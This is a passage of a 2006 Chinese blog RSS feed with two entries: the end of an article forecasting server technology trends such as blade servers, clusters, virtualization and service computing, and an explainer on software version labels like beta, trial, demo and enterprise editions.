第二，刀片式服务器进入技术及应用成熟期。 <br><br>　　刀片式服务器技术也不是新概念，这种技术走向市场开始于1999年，2001年开始发展刀片式交换机和存储虚拟化，2004年注重刀片式服务器整体性能提升，2005年注重刀片式服务器专用化。2006年，刀片式服务器产品在多核、低功耗技术的推动下将从最初追求高密度的第一代刀片，发展到强调整体综合性能、高生产力的第二代刀片产品。孙凝晖博士认为，虽然刀片服务器相对于1U机架服务器并没有带来计算机应用模式的更大突破，也不可能取代机架服务器，但未来两到三年，刀片式服务器将以更高密度、敏捷式部署和维护、全方位监控管理、高可扩展性、高可用性为发展重点，刀片式服务器随之也会成为与机架式服务器并驾齐驱的成熟的主流产品。 <br><br>　　第三，工业标准化机群继续加速泛高性能计算时代。 <br><br>　　孙凝晖博士认为，研发出的高性能计算机是否成功并不在于取得了多高的计算性能突破，而更在于其对应用模式的改变。泛高性能计算时代的标志是高性能计算在各行各业的广泛使用，应用的门槛很低，包括低价格、易管理、易用、丰富的应用。曾宇也认为，工业标准化机群是走向泛高性能计算时代的必由之路，2006年，机群的远程/异地操作控制、一体化监控、负载均衡、智能机柜、异构支持、机群简易管理、机群快速部署、机群高速I/O、机群安全、行业应用等技术的发展和标准化，将促使工业标准化机群进一步被行业应用广泛接受。而孙凝晖博士更是预言，未来市场上将会出现以高性能计算普及为目标、以机群标准化技术为支撑的桌面型高性能计算机产品，他的目标是到2010年把万亿次的高性能计算机做成10万人民币就能买到的桌面产品。 <br><br>　　高性能计算时代正在来临，双核、虚拟化步入桌面是不是就是一些征兆呢？ <br><br>　　第四，64位x86架构小型机与RISC小型机的交锋将更深入。 <br><br>　　因为历史原因，多年来信息化建设的关键应用一直被传统的RISC小型机所统治和垄断。但是随着64位、多核、低功耗的x86架构处理器进一步向高端发展，Linux、Open Solaris、Windows等操作系统对8～32路x86架构SMP服务器的进一步支持，尤其是在可靠性、稳定性等方面的进一步提升，以及中间件技术和企业大型应用的平台无关性的趋势，基于开放和标准的64位x86架构多路SMP服务器，也将能够在信息化建设的关键应用领域担当重要角色。曾宇认为，基于x86的多路服务器系统在2006年对传统小型机的挑战将更为激烈，特别是通过与金融、电信等对可靠性、性能要求极高的高端应用的进一步融合，以高性价比为竞争优势，必将成为实现我国低成本信息化的可行之路。 <br><br>　　第五，虚拟计算技术在部件、系统及应用级的全面发展。 <br><br>　　虚拟化已经无处不在，虚拟化产品层出不穷，Microsoft的Virtual Server、VMware的VMware Workstation、Xensource的Xen、IBM的 hypervisor技术、Intel的Vanderpool和Silvervale、AMD的Pacifica、Sun的Solaris Zone、HP的三层虚拟化规范等虚拟化技术和虚拟化产品，使人们有充分理由相信虚拟化技术在2006年将在系统、部件及应用级全面发展，带来更高的部件及系统级利用率，带来具有透明负载均衡、动态迁移、故障自动隔离、系统自动重构的高可靠服务器应用环境，以及更为简洁、统一的服务器资源分配管理模式。孙凝晖博士更是大胆预测，二十年后虚拟化的发展将终结任何处理器、操作系统的垄断，大家都处在一个虚拟化的大计算环境中各取所需。 <br><br>　　第六，体系结构突破性创新成果初步显现。 <br><br>　　孙凝晖博士认为，高性能和高效能计算机的体系结构正处于突破性创新的前夜，IBM PERCS计划、Sun HERO计划、Cray Cascade计划、我国的百万/千万亿次高性能计算机计划，无不蕴示着计算机体系结构创新的深度和广度将有更进一步的发展，这些产品一旦出来都将是对目前计算体系的颠覆，是所有人都应该关注的; 存储海（Sea of memory）、内存内嵌处理器（PIM）、Interval Arithmetic、异步SMP、智能内存、贴近通信、超并行结构（Hyper Parallel Processing）、异构多核……，在2006年，人们同样也期待这场体系结构创新的新成果能显现出来。 <br><br>　　第七，服务器安全进一步向一体化融合。 <br><br>　　在服务器的安全技术方面，曾宇认为，在2006年，基于内外网隔离、统一身份认证、访问控制、分布式入侵检测、流量分析、应用层及传输层加密传输协议、主动防护等技术，将催生一体化的服务器安全框架，从而打造从物理层到应用层全方位的、多层次的、立体的服务器应用安全计算环境。 <br><br>　　第八，服务计算的应用模式更加明朗。 <br><br>　　网格计算、Web service技术、Thin Client Computing、On-demand Computing 、Utility Computing，这些技术推动了服务计算应用模式的兴起。孙凝晖博士认为，在2006年，服务器作为不可缺少的有机载体，将进一步实现以服务计算为形式，以瘦客户端计算为基础，以普适计算为目标的计算融合。 <br><br>　　同时他也指出，能力服务器作为一种新兴服务计算应用模式，是更为理想的应用模式，它将虚拟更多物理资源，把后台屏蔽为更多提供各种能力的能力服务器，前台PC也将被一些更简单的终端取代，如果成功，它将彻底改变我们目前的PC模式。能力服务器在2006年也将出现初步的产品形态，不过孙凝晖认为，影响产业界至少还要5年时间。 <br><br>　　链接:能力服务器 <br><br>　　能力服务器又被称为CPU服务器，是目前中科院计算所重点在研的一个项目。该研究项目致力于面向下一代信息化的能力服务计算体系基础的研究，其核心是能力服务器，其目的是能力（如计算和存储）以服务的形式按需地、透明地、无处不在满足用户的任何计算和存储的需求。主要研究目标如何实现计算资源的虚拟化（服务化），如何建立用户与计算资源的动态绑定（服务请求的调度），如何将与一个用户动态绑定的所有资源聚合起来，协同完成更大的计算任务，并实现各个计算任务之间的交互。目标是发展一种全新的高性能网格计算机体系结构，基于瘦客户端思想，通过在软硬件两个层次上的虚拟化技术实现大规模资源共享，提高资源利用率，最终提供下一代信息系统所需的基础体系。  <br>]]>
               </description>
                    <author>智慧电脑</author>
         <category>个人博客</category>
                      <label domain="http://blog.china.alibaba.com/blog/2784477/tag/tKbFrrXY.html">处女地</label>
         	                  <pubDate>2006/04/04 17:46:37</pubDate>
      </item>
            <item>
         <title><![CDATA[ 软件版本号详解   ]]></title>
         <link><![CDATA[http://blog.china.alibaba.com/blog/2784477/article/b0-i557168.html]]></link>
                          <description>
                   <![CDATA[软件版本号详解  <br> <br><br><br>大家或许已经注意到了，网上下载的软件常常标有Beta版、Demo版等软件版本信息，这些版本信息实际上有其内在的含义。下面我们就将一些常见的软件版本信息向大家做一详细的介绍。 <br><br><br><br>测试版与演示版 <br><br>α版 <br><br><br>此版本表示该软件仅仅是一个初步完成品，通常只在软件开发者内部交流，也有很少一部分发布给专业测试人员。一般而言，该版本软件的Bug较多，普通用户最好不要安装。 <br><br><br>β（Beta）版 <br><br><br>该版本相对于α版已有了很大的改进，消除了严重的错误，但还是存在着一些缺陷，需要经过大规模的发布测试来进一步消除。这一版本通常由软件公司免费发布，用户可从相关的站点下载。通过一些专业爱好者的测试，将结果反馈给开发者，开发者们再进行有针对性的修改。该版本也不适合一般用户安装。 <br><br><br>γ版 <br><br><br>该版本已经相当成熟了，与即将发行的正式版相差无几，如果用户实在等不及了，尽可以装上一试。 <br><br><br>Trial（试用版） <br><br><br>试用版软件在最近的几年里颇为流行，主要是得益于互联网的迅速发展。该版本软件通常都有时间限制，过期之后用户如果希望继续使用，一般得交纳一定的费用进行注册或购买。有些试用版软件还在功能上做了一定的限制。 <br><br><br>Unregistered（未注册版） <br><br><br>未注册版与试用版极其类似，只是未注册版通常没有时间限制，在功能上相对于正式版做了一定的限制，例如绝大多数网络电话软件的注册版和未注册版，两者之间在通话质量上有很大差距。还有些虽然在使用上与正式版毫无二致，但是动不动就会弹出一个恼人的消息框来提醒你注册，如看图软件ACDSee、智能陈桥汉字输入软件等。 <br><br><br>Demo版 <br><br><br>也称为演示版，在非正式版软件中，该版本的知名度最大。Demo版仅仅集成了正式版中的几个功能，颇有点像Unregistered。不同的是，Demo版一般不能通过升级或注册的方法变为正式版。 <br><br><br>以上是软件正式版本推出之前的几个版本，α、β、γ可以称为测试版，大凡成熟软件总会有多个测试版，如Windows 98的β版，前前后后将近有10个。这么多的测试版一方面为了最终产品尽可能地满足用户的需要，另一方面也尽量减少了软件中的Bug。而Trial、Unregistered、Demo有时统称为演示版，这一类版本的广告色彩较浓，颇有点先尝后买的味道，对于普通用户而言自然是可以免费尝鲜了。 <br><br>正式版 <br><br>不同类型的软件的正式版本通常也有区别。 <br><br><br>Release <br><br><br>该版本意味“最终释放版”，在出了一系列的测试版之后，终归会有一个正式版本，对于用户而言，购买该版本的软件绝对不会错。该版本有时也称为标准版。一般情况下，Release不会以单词形式出现在软件封面上，取而代之的是符号(r)，如Windows NT(r) 4.0、MS-DOS(r) 6.22等。 <br><br><br>Registered <br><br><br>很显然，该版本是与Unregistered相对的注册版。注册版、Release和下面所讲的Standard版一样，都是软件的正式版本，只是注册版软件的前身有很大一部分是从网上下载的。 <br><br><br>Standard <br><br><br>这是最常见的标准版，不论是什么软件，标准版一定存在。标准版中包含了该软件的基本组件及一些常用功能，可以满足一般用户的需求。其价格相对高一级版本而言还是“平易近人”的。 <br><br><br>Deluxe <br><br><br>顾名思义即为“豪华版”。豪华版通常是相对于标准版而言的，主要区别是多了几项功能，价格当然会高出一大块，不推荐一般用户购买。此版本通常是为那些追求“完美”的专业用户所准备的。 <br><br><br>Reference <br><br><br>该版本型号常见于百科全书中，比较有名的是微软的Encarta系列。Reference是最高级别，其包含的主题、图像、影片剪辑等相对于Standard和Deluxe版均有大幅增加，容量由一张光盘猛增至三张光盘，并且加入了很强的交互功能，当然价格也不菲。可以这么说，这一版本的百科全书才能算是真正的百科全书，也是发烧友们收藏的首选。 <br><br><br>Professional（专业版） <br><br><br>专业版是针对某些特定的开发工具软件而言的。专业版中有许多内容是标准版中所没有的，这些内容对于一个专业的软件开发人员来说是极为重要的。如微软的Visual FoxPro标准版并不具备编译成可执行文件的功能，这对于一个完整的开发项目而言显然是无法忍受的，若客户机上没有FoxPro将不能使用。如果用专业版就没有这个问题了。 <br><br><br>Enterprise（企业版） <br><br><br>企业版是开发类软件中的极品（相当于百科全书中的Reference版）。拥有一套这种版本的软件可以毫无障碍地开发任何级别的应用软件。如著名的Visual C++的企业版相对于专业版来说增加了几个附加的特性，如SQL调试、扩展的存储过程向导、支持AS/400对OLE DB的访问等。而这一版本的价格也是普通用户无法接受的。如微软的Visual Studios 6.0 Enterprise中文版的价格为23000元。 <br><br>其他版本 <br><br>除了以上介绍的一些版本外，还有一些专有版本名称。 <br><br><br>Update（升级版） <br><br><br>升级版的软件是不能独立使用的，该版本的软件在安装过程中会搜索原有的正式版，如果不存在，则拒绝执行下一步。如Microsoft Office 2000升级版、Windows 9x升级版等等。 <br><br><br>OEM版 <br><br><br>OEM版通常是捆绑在硬件中而不单独销售的版本。将自己的产品交给别的公司去卖，保留自己的著作权，双方互惠互利，一举两得。 <br><br><br>单机（网络）版 <br><br><br>网络版在功能、结构上远比单机版复杂，如果留心一下软件的报价，你就会发现某些软件单机版和网络版的价格相差非常大，有些网络版甚至多一个客户端口就要加不少钱。 <br><br><br>普及版 <br><br><br>该版本有时也会被称为共享版，其特点是价格便宜（有些甚至完全免费）、功能单一、针对性强（当然也有占领市场、打击盗版等因素）。与试用版不同的是，该版本的软件一般不会有时间上的限制。当然，如果用户想升级，最好还是去购买正式版。 <br>以上是一些常见软件版本的简要介绍，随着软件市场行为的变化，现在也出现了一些新的版本命名方式，比如Windows XP中的XP是取自于Experience中的第二、第三个字母。希望以上内容能够对大家的购买、使用和下载软件有所帮助。  <br>]]>
               </description>
                    <author>智慧电脑</author>
         <category>个人博客</category>
                      <label domain="http://blog.china.alibaba.com/blog/2784477/tag/tKbFrrXY.html">处女地</label>
         	                  <pubDate>2006/04/04 17:43:51</pubDate>
      </item>
         </channel>
</rss>
